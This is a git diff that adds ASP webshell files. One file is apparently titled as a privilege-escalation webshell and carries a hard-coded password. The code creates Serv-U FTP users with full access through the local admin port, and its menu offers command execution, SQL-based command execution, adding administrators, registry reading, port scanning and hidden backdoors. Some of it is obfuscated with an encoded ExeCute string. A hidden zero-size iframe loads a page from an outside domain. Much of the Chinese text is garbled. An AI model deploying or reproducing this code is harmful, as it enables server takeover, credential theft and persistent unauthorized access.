+"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
+"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
+"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
+"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf
+'leaves = leaves & "quit" & vbcrlf
+'--------
+On Error Resume Next
+Set xPost = CreateObject("MSXML2.XMLHTTP")
+xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost.Send(leaves)
+Set xPOST=nothing
+RRS ("����ɹ�ִ�У���FTP �û���: " & tuser & " " & "����: " & tpass & " ·��: " & tpath & " :)<br><BR>")
+else
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf
+Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost3.Send(leaves)
+Set xPOST3=nothing
+RRS "<font color=#ffffff>OKOKOK</font><br><BR>"
+end if
+End Function
+Case "ScanDriveForm" 
+ ScanDriveForm
+ Case "ScanDrive"     
+  ScanDrive Request("Drive")
+  Case "ScFolder"      
+   ScFolder Request("Folder")
+case "apjdel":apjdel():case "Servu7x":su7():case "fuzhutq1":fuzhutq1():case "fuzhutq2":fuzhutq2():case "fuzhutq3":fuzhutq3():case "fuzhutq4":fuzhutq4():case "fuzhutq5":fuzhutq5():case "Cmd2":cmd2():case "suftp":suftp():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute SinfoEn("r(ErowShn he tu~rvSe>~n<ioct Aif)`l>tm/h><dybo</S~RR~",Pos)
+
+
+
+
+response.write ""+vbCrLf+""+vbCrLf+""
+%>
+<iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe>
\ No newline at end of file
diff --git a/www-7jyewu-cn/星外虚拟机提权专用asp大马.asp b/www-7jyewu-cn/星外虚拟机提权专用asp大马.asp
new file mode 100644
index 0000000..d40026c
--- /dev/null
+++ b/www-7jyewu-cn/星外虚拟机提权专用asp大马.asp
@@ -0,0 +1,1296 @@
+<%
+UserPass="woshidaka"'	����
+Server.ScriptTimeout=999999999
+Response.Buffer =true
+On Error Resume Next
+'------------------------�ڲ����� ��----------------------
+mmname   ="����-����-����-����������Ȩר��Webshell" 'shell����
+mmshell ="����������Ȩר��Webshell 80sec��Ʒ" 'shell��Ȩ
+errout ="������󣡣���" '���������ʾ
+serversoft=Request.ServerVariables("server_software")
+'-------------------------------------------
+
+response.write ""+vbCrLf+""+vbCrLf+""
+
+Response.Buffer = True
+Server.ScriptTimeOut=999999999
+  
+CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"
+
+
+'��·������ \ 
+function GetFullPath(path)
+	GetFullPath = path
+	if Right(path,1) <> "\" then GetFullPath = path&"\" '����ַ������ \ �ľͼ���
+end function
+
+'ɾ���ļ�
+Function Deltextfile(filepath)
+ On Error Resume Next
+ Set objFSO = CreateObject(CONST_FSO) 
+  if objFSO.FileExists(filepath) then '����ļ��Ƿ���� 
+   objFSO.DeleteFile(filepath) 
+  end if 
+ Set objFSO = nothing
+ Deltextfile = Err.Number '���ش����� 
+End Function 
+
+
+'���Ŀ¼�Ƿ��д 0 Ϊ�ɶ�д 1Ϊ��д������ɾ��
+Function CheckDirIsOKWrite(DirStr)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)
+	filepath = GetFullPath(DirStr)&fso.GettempName
+	FSO.CreateTextFile(filepath) 
+	CheckDirIsOKWrite = Err.Number '���ش����� 
+	if  ShowNoWriteDir and (CheckDirIsOKWrite =70) then
+		Response.Write "[<font color=#0066FF>Ŀ¼</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>"
+	end if
+	set fout =Nothing
+	set FSO = Nothing
+	Deltextfile(filepath) 'ɾ����
+	if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
+end Function
+
+'����ļ��Ƿ�����޸�(�˷������޸�����,���ܻ��е㲻׼������������)
+function CheckFileWrite(filepath)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)	
+	set getAtt=FSO.GetFile(filepath)
+	getAtt.Attributes = getAtt.Attributes
+  CheckFileWrite = Err.Number 
+	set FSO = Nothing
+	set getAtt = Nothing  
+end function
+
+'���Ŀ¼�Ŀɶ�д��
+function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)
+	B = FSO.FolderExists(Path)
+	set FSO=nothing
+	
+  '�Ƿ�Ϊ��ʱĿ¼���Ƿ�Ҫ���
+  IS_TEMP_DIR =	(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
+  		
+	if B=false then '�������Ŀ¼�ͽ����ļ����
+	'==========================================================================
+		Re = CheckFileWrite(Path) '����Ƿ��д
+		if Re =0 then
+			Response.Write "[�ļ�]<font color=red>"&Path&"</font><br>"
+			b =true
+			exit function
+		else
+			Response.Write "[<font color=red>�ļ�</font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"						
+			exit function
+		end if	
+	'==========================================================================	
+	end if
+	
+
+	
+	Path = GetFullPath(Path) '�� \	
+	
+	re = CheckDirIsOKWrite(Path) '��ǰĿ¼Ҳ���һ��
+	if (re =0) or (re=1) then
+		Response.Write "[Ŀ¼]<font color=#0000FF>"& Path&"</font><br>"
+	end if
+
+Set FSO = Server.CreateObject(CONST_FSO)
+set f = fso.getfolder(Path)
+
+
+
+if (CheckFile=True) and (IS_TEMP_DIR=false) then
+b=false
+'======================================
+for each file in f.Files
+	Re = CheckFileWrite(Path&file.name) '����Ƿ��д
+	if Re =0 then
+		Response.Write "[�ļ�]<font color=red>"& Path&file.name&"</font><br>"
+		b =true
+	else
+		if ShowNoWriteDir then Response.Write "[<font color=red>�ļ�</font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"			
+	end if
+next
+if b then response.Flush '��������ݾ�ˢ�¿ͻ�����ʾ
+'======================================
+end if
+
+
+
+'============= Ŀ¼��� ================
+for each file in f.SubFolders
+if CheckNextDir=false then '�Ƿ�����һ��Ŀ¼
+	re = CheckDirIsOKWrite(Path&file.name)
+	if (re =0) or (re=1) then
+		Response.Write "[Ŀ¼]<font color=#0066FF>"& Path&file.name&"</font><br>"
+	end if
+end if
+	
+	if (CheckNextDir=True) and (IS_TEMP_DIR=false) then '�Ƿ�����һ��Ŀ¼
+			ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir '�ټ����һ��Ŀ¼
+	end if
+next
+'======================================
+Set FSO = Nothing
+set f = Nothing
+end function
+
+Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:
+ExeCute "sub ShowErr():If Err Then:RRS""<br><a href='javascript:history.back()'><br>&nbsp;"" & Err.Description & ""</a><br>"":Err.Clear:Response.Flush:End If:end sub"
+Sub RRS(str):response.write(str):End Sub
+Function RePath(S)
+RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S):RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action"):Pos=2
+RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+Serveru=request.servervariables("http_host")&url
+FolderPath=Request("FolderPath"):
+Pn=pos*44:FName=Request("FName"):pso=5:BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mmname&" - "&ServerIP&"--Soft - "&serversoft&"</title>"
+RRS ""&copyurl&""
+rrS"<style type=""text/css"">"
+rrs"body,td,center,label{font-size: 12px;background-color:#383838; color:#00ff00;SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #008000; SCROLLBAR-SHADOW-COLOR: #008000; SCROLLBAR-3DLIGHT-COLOR: #00FF00; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #000000; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #000000}"
+rrs"input,select,textarea{BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-LEFT-COLOR: #008000; BACKGROUND: #383838; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #008000; COLOR: #00ff00; BORDER-TOP-COLOR: #008000; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #008000}"
+rrs"hr{color:#00ff00}"
+rrs".C{background-color:#000;border:0px}"
+rrs".cmd{background-color:#000;color:#FFF}"
+rrs"body{margin: 0px;margin-left:4px;}"
+rrs"BODY{color:#383838}"
+rrs"a{color:#008000;text-decoration: none;}a:hover{color:#00ff00;background:#000}"
+rrs".am{color:#888;font-size:12px;}"
+rrs"</style>"
+rRs"</style>"
+ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~<rs;~`lse;}rn fa retu;else trueeturn~~))r�˲�����ȷ��Ҫִ��rm(~~confi{if (sok()on yeunctiRRS~f~`();}~ubmitorm.saddrf;top.oldere = F.valurPathFoldeform..addr){topolderder(FowFolon ShunctiRRS~f`~~;}} = ~~valueName.orm.Fhidef{top.}elseit();.submeformp.hidon;toFActiue = n.valActioform..hide){top=nullName!}if(Der~~;~~Othme = e{DNa;}elsDNameue = e.val.FNameformp.hide);to,FNam���ڣ�~~���ļ��Ƿ�ȫ����,עMdb�ļ���Ҫѹ����(~~����rompte = p{DNamdb~~)pactM~~Comion==(FActse ife;}el DNamlue =me.vam.FNadeforop.hime);t~,FNa��ͬ����~��,ע�ⲻb�ļ�ȫ���½���Md~������Ҫmpt(~= proName ~~){DteMdb~Creaon==~FActie if(;}elsDNameue = e.val.FNameformp.hide);to,FNamȫ����~~�����ļ���������Ҫ��pt(~~ promame =~){DNlder~NewFon==~~Actio if(F}elseName;|~~+D~~|||e += .valuFNameform..hide);topFName����~~,���ļ���ȫ���ƶ���Ŀ(~~����rompte = p{DNamer~~)eFold~~Movion==(FActse ife;}el+DNam|||~~= ~~|lue +me.vam.FNadeforop.hime);t~,FNa��ȫ����~��Ŀ���ļ��������ƶ�pt(~~ promame =~){DNlder~opyFo==~~Cctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ�����ƶ���Ŀ(~~����rompte = p{DNamle~~)oveFi==~~Mctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ���븴�Ƶ�Ŀ(~~����rompte = p{DNamle~~)opyFi==~~Cctionif(FAName;e = F.valuFNameform..hide){topctionme,FAm(FNallForon FuunctiRRS~f~",Pso)
+RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""�����������ݿ�"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""��ֻ��ʾһ������ʱ������ʾ�ֶε�ȫ���ֽڣ������������Ʋ�ѯʵ��.\n����һ������ֻ��ʾ�ֶε�ǰ��ʮ���ֽ�X"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>��ȷ�ϼ��������ݿ�������SQL�����������5</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""�������ݿ����Ӵ��Ƿ���ȷ!"");return false;}if(str.length<10){alert(""����SQL����Ƿ���ȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
+RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "�ļ��������":Sot(1,0) = "wscript.shell":Sot(1,2) = "������ִ�����":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS�������":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ�����":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "�������ϴ��������":Sot(5,0) = "Adodb.connection":Sot(5,2) = "���ݿ��������":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "�������ϴ����":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp �ļ��ϴ����":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "���Ʒ��ļ��ϴ����":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload �ļ��ϴ����":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail �ʼ��շ����":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "����SMTP�������":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail�������":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "���ݴ������"
+For i=0 To 13
+Set T=Server.CreateObject(Sot(i,0))
+If -2147221005 <> Err Then
+IsObj=" ��"
+Else
+IsObj=" ��"
+Err.Clear
+End If
+Set T=Nothing
+Sot(i,1)=IsObj
+Next
+
+
+
+
+If FolderPath<>"" then
+Session("FolderPath")=RRePath(FolderPath)
+End If:If Session("FolderPath")="" Then
+FolderPath=RootPath
+Session("FolderPath")=FolderPath
+End if
+Function MainForm() 
+RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<tr>X��<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>2E��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>n#��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\`��ʼe�˵�\\����\\"")'>����</a>ib��<a href='javascript:ShowFolder(""c:\\Documents and Settings\\All Users\\a��ʼp�˵�\\����\\����"")'>����</a>ib��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>LM��<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>Dv��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Media Index\\"")'><font color=red>~���ⳣд~</font></a>:����<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>IJ��<a href='javascript:ShowFolder(""c:\\PHP"")'>PHP</a>ED��<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>WP��<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>eF<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>m?<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>v,<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>��д</a>7"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='40' align='left'>��ַ��</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='70' align='center'><input name='Submit' type='submit' value='GOGO'>" 
+RRS"</td></tr></form></table>"
+RRS"<table width='100%' height='96%' style='border:1px solid #008000;' cellpadding='0' cellspacing='0'>"
+RRS"<td width='135' id=tl>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+RRS"<td width=1 style='background:#008000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#008000'><td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+End Function:Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
+RRS"<tr><td><hr hight=1 width='100%'>"
+RRS"</td></tr>"
+If soT(0,1)=" ��" Then
+RRS"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
+RRS"<tr><td height='20'> <a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>��վ��Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>������Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=goback' target='FileFrame'>���ϼ�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>���½�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>���½��ı�</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=downloads' target='FileFrame'>��Զ������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=UpFile' target='FileFrame'>���ϴ��ļ�</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanDriveForm' target='FileFrame'>����дĿ¼</font></a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=att' target='FileFrame'>���޸�Ȩ��</font></a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=hiddenshell' target='FileFrame'>�����ش���</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq1' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq2' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq3' target='FileFrame'><font color=red>��N��������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq4' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq5' target='FileFrame'><font color=red>��ɨĿ¼��д��D��</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Course' target='FileFrame'>���û��˺�</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=adminab' target='FileFrame'>�������Ա</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=getTerminalInfo' target='FileFrame'>���Զ���¼</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ServerInfo' target='FileFrame'>�����֧��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd1Shell' target='FileFrame'>��ִ��CMD����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd2' target='FileFrame'>��Cmd2</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=MMD' target='FileFrame'>��SQLִ��CMD</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanPort' target='FileFrame'>���˿�ɨ��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu' target='FileFrame'>��Serv-u��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=suftp' target='FileFrame'>��Serv-u Ftp��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu7x' target='FileFrame'>��Serv-u7x��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ReadREG' target='FileFrame'>����ע���</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=aspx' target='FileFrame'>��ASPX̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=php' target='FileFrame'>��PHP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=jsp' target='FileFrame'>��JSP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=1' target='FileFrame'>���߼�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=2' target='FileFrame'>����������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=Cplgm&M=3' target='FileFrame'>�������滻</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=DbManager' target='FileFrame'>�����ݿ����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=PageAddToMdb' target='FileFrame'>��������</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Logout' target='_top'>���˳���¼</a></td></tr>"
+End if
+RRS"</table></table>"
+End Function:
+Sub ScanDriveForm() 
+    Dim FSO,DriveB
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+Response.Write "<TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgColor=#fff>"
+Response.Write "  <TR>"
+Response.Write "    <TD colspan=5 >����/ϵͳ�ļ�����Ϣ</TD>"
+Response.Write "  </TR>"
+
+
+  For Each DriveB in FSO.Drives
+
+Response.Write "  </TR>"
+Next
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(0)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>Windows�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(0)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(1)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>System32�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(1)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(2)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(2)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "</TABLE><BR>"
+Response.Write "<DIV align=center>"
+Response.Write "<b>��ǰ��վ����·��:"&Server.MapPath("/")&"</b>"
+Response.Write "  <FORM Action="
+Response.Write "?Action=ScFolder method=Post>ָ���ļ��в�ѯ��"
+Response.Write "    <INPUT type=text name=Folder>"
+Response.Write "	<INPUT type=submit value=���ɱ���>Wָ���ļ���·��b�磺F:\ASP\"
+Response.Write "  </FORM>"
+Response.Write "<DIV>"
+	Set FSO=Nothing
+End Sub
+
+Sub ScanDrive(Drive) 
+    Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+	If Drive <> "" Then
+	    Set FSO = Server.Createobject("Scripting.FileSystemObject")
+		Set TestDrive = FSO.GetDrive(Drive)
+		If TestDrive.IsReady Then
+		    Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(GetTheSize(TestDrive.TotalSize)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+
+			Set BaseFolder = TestDrive.RootFolder
+			Set TempFolders = BaseFolder.SubFolders
+			For Each D in TempFolders
+			    Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+			Next
+			Set TempFolder = Nothing
+			Set BaseFolder = Nothing
+	    Else
+		    Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+			Dim TempFolderList,t
+			t=0
+			Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+			TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+			For i = 0 to Ubound(TempFolderList)
+			    If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+				    t = t+1
+					Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+			    End if
+		    Next
+			If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+	    End if
+		Set TestDrive = Nothing
+	    Set FSO = Nothing
+		Temp_Str = Temp_Str & "<LI>ע�⣺" & Red("��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!")
+		Message Drive & ":������Ϣ",Temp_Str,1
+	End if
+End Sub
+
+Sub ScFolder(folder) 
+    On Error Resume Next
+	Dim FSO,OFolder,TempFolder,Scmsg,S
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+	If FSO.FolderExists(folder) Then
+	    Set OFolder = FSO.GetFolder(folder)
+		Set TempFolders = OFolder.SubFolders
+		Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+		For Each S in TempFolders
+		     Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S)  
+		Next
+		Set TempFolders = Nothing
+		Set OFolder = Nothing
+	Else
+	    Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+	End if
+	Scmsg = Scmsg & "<LI>ע�⣺" & Red("��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!")
+	Set FSO = Nothing
+	Message "�ļ�����Ϣ",Scmsg,1
+End Sub
+
+Function ScReWr(folder):
+ On Error Resume Next
+   Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+   Set FSO = Server.Createobject("Scripting.FileSystemObject")
+   Set TestFolder = FSO.GetFolder(folder)
+   Set TestFileList = TestFolder.SubFolders
+   RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+   For Each A in TestFileList
+   Next
+   If err Then
+       err.Clear
